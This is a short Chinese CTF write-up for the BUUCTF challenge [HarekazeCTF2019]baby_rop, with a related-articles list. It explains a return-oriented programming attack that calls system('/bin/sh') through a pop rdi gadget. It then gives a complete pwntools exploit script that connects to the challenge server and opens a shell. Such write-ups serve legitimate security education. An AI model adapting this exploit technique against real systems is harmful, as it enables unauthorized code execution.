buuctf [HarekazeCTF2019]baby_rop
2020-05-07 04:25
1801 查看
可以在程序里找到binsh,ctrl+L,
程序本身有system函数
找到rop
修改system参数为/bin/sh,然后跳转到system运行就可以了,最后加一个假的返回地址
from pwn import * from LibcSearcher import * context.os='linux' context.arch='amd64' context.log_level='debug' r = remote('node3.buuoj.cn',28862) #r = process('./ciscn_2019_en_2') #elf = ELF('./ciscn_2019_en_2') bin_sh_addr = 0x601048 system = 0x400490 pop_di = 0x0000000000400683 # pop rdi ; ret p = flat(['a'*0x10, 'b'*8, pop_di, bin_sh_addr, system, 0xdeadbeef]) r.sendline(p) r.interactive()Tower2358 原创文章 31获赞 1访问量 887 关注 私信
相关文章推荐
- 【Writeup】BUUCTF_Pwn_[OGeek2019]babyrop
- buuctf bjdctf_2020_babyrop
- buuctf [HarekazeCTF2019]baby_rop2
- buuctf 极客大挑战 babysql
- 1.实验吧_ropbaby(西普杯CTF)_onegadget
- Defcon - 2015 - 初赛 - r0pbaby writeup
- 【3.24】学习笔记 --ROP
- 基于ret2libc3的简单ROP实验
- 【Writeup】BUUCTF_Web_高明的黑客
- 我的BABY开始做梦了,^_^(28周)
- [极客大挑战 2019]BabySQL(replace()的简单过滤)
- BabyLinux制作过程详解(转)
- BabyLinux制作过程详解
- [转-来自啊泰]推模式下dataset1下显示的是"...未找到项目..." 问题的解决 [http://www.cnblogs.com/babyt/archive/2005/04/15/138582.html]
- [英语阅读]The Baby Eagle 小鹰的故事
- take candy from a baby 唾手可得
- come on baby
- Linux baby rocker 源码
- POJ 2417 Discrete Logging 离散对数/BabyStep_GiantStep
- Baby-step giant-step